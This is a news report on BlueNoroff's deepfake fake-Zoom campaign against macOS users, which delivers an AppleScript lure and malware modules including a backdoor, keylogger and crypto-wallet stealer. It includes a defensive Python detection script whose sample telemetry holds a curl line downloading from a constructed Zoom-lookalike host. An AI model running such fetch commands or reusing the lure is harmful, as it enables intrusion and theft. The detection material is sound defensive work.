Passionategeekz, June 19 news: technology media outlet BleepingComputer published a report yesterday (June 18) that the hacking group BlueNoroff (also known as Sapphire Sleet and TA444) has been staging fake Zoom video calls with forged company executives to induce employees to install custom malware.
The group's goal is cryptocurrency theft, and this campaign specifically targets macOS devices; it was discovered by Huntress researchers on June 11, 2025.
Citing the blog post, Passionategeekz reports that BlueNoroff targeted employees of a technology company using deepfake technology: the attackers posed as external professionals and sent fake scheduling links via Telegram to lure victims into joining what appeared to be an ordinary Google Meet meeting.
The link actually redirected to an attacker-controlled fake Zoom domain. During the meeting, deepfake videos of company executives appeared alongside "external participants" to make the call more convincing.
During the meeting the victim experienced a microphone problem, and the fake executive "suggested" downloading a "Zoom extension" to fix it. The link delivers an AppleScript file (zoom_sdk_support.scpt); when run, it displays what looks like a legitimate Zoom support page as cover, executes malicious commands, and downloads the second-stage payload from a forged Zoom server (httpssupportus05webzoombiz).
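As an added example (not code from the report or from Huntress), the Python script below shows how a defender could flag the delivery pattern described above in process-execution telemetry: osascript running a .scpt from a download location, a script named to look like Zoom software, and a download from a Zoom lookalike domain. The process lines, the list of legitimate Zoom domains and the lookalike domain are constructed sample values, not indicators from the report.

```python
import re
from urllib.parse import urlparse

# Domains Zoom itself serves from (assumption: extend for your environment).
LEGIT_ZOOM_SUFFIXES = ("zoom.us", "zoom.com")

# Constructed sample: "pid|user|command" records as an EDR or `ps` export might give them.
SAMPLE_PROCESS_LINES = [
    "501|alice|/usr/bin/osascript /Users/alice/Downloads/zoom_sdk_support.scpt",
    "502|alice|/Applications/zoom.us.app/Contents/MacOS/zoom.us",
    "503|bob|/usr/bin/osascript /Users/bob/Library/Scripts/backup.scpt",
    "504|bob|/usr/bin/curl -fsSL https://support.example-zoom.biz/sdk/update -o /tmp/u",
]

SCPT_RE = re.compile(r"osascript\s+(\S+\.scpt)", re.IGNORECASE)
URL_RE = re.compile(r"https?://\S+")
DOWNLOAD_DIRS = ("/Downloads/", "/Desktop/", "/tmp/")


def is_zoom_lookalike(url: str) -> bool:
    """True when the host name contains 'zoom' but is not under a legitimate Zoom domain."""
    host = (urlparse(url).hostname or "").lower().rstrip(".")
    if "zoom" not in host:
        return False
    return not any(host == s or host.endswith("." + s) for s in LEGIT_ZOOM_SUFFIXES)


def scan(lines):
    """Return {pid: [finding, ...]} for every record that trips at least one rule."""
    hits = {}
    for line in lines:
        pid, _user, cmd = line.split("|", 2)
        findings = []
        m = SCPT_RE.search(cmd)
        if m:
            path = m.group(1)
            if any(d in path for d in DOWNLOAD_DIRS):
                findings.append("scpt_from_download_dir")   # script run straight from a download location
            if "zoom" in path.lower():
                findings.append("zoom_named_script")         # masquerading as Zoom software
        for url in URL_RE.findall(cmd):
            if is_zoom_lookalike(url):
                findings.append("zoom_lookalike_url")        # fetch from a Zoom-themed non-Zoom domain
        if findings:
            hits[pid] = findings
    return hits


if __name__ == "__main__":
    for pid, findings in scan(SAMPLE_PROCESS_LINES).items():
        print(pid, ", ".join(findings))
```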
Huntress found that the attack implanted 8 malicious programs; the core modules include:
- Telegram 2: written in Nim and disguised as a Telegram updater; it runs periodically and acts as the gateway for later stages of the attack. It is signed with a legitimate developer certificate to evade detection.
- Root Troy V4: a remote-control backdoor written in Go that supports remote code execution, a queue of commands to run after a sleep state, and payload download; it is the hub of the attack.
- InjectWithDyld: a second-stage loader that decrypts AES-encrypted malicious code and injects it using macOS-specific process-injection APIs; it also has an anti-forensics function that clears logs.
- XScreen (keyboardd): a monitoring module that continuously records keystrokes, screen content and clipboard contents and sends them to the command-and-control server in real time.
- CryptoBot (airmond): a cryptocurrency wallet stealer that supports more than 20 wallet platforms; stolen data is encrypted and cached before being sent out.
Huntress notes that although Mac users generally believe they are at low risk of attack, attackers are accelerating the development of targeted threats as macOS becomes more common in enterprises.